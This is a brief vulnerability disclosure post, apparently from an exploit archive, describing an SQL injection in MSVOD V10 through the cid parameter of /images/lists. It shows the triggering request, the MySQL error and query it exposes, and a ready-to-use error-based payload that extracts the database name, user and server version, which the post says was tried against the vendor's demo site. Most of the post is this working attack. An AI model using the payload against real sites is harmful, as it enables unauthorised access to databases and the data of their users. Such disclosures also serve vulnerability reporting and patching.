MSVOD V10 – SQL Injection

Hzllaga Tuesday, July 17, 2018

MSVOD V10 – SQL Injection via /images/lists

The $cid parameter controllable.

Open the page:/images/lists?cid=’

Then SQL will be error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1' at line 1
And we can see that Error SQL Statement:
SELECT COUNT(*) AS tp_count FROM `ms_atlas` WHERE ( ms_atlas.status = 1 and ms_atlas.is_check=1 and (ms_atlas.class = ' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1
So Final Payload:
Official demo:,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20–%20




HongCMS 3.0.0 – SQL Injection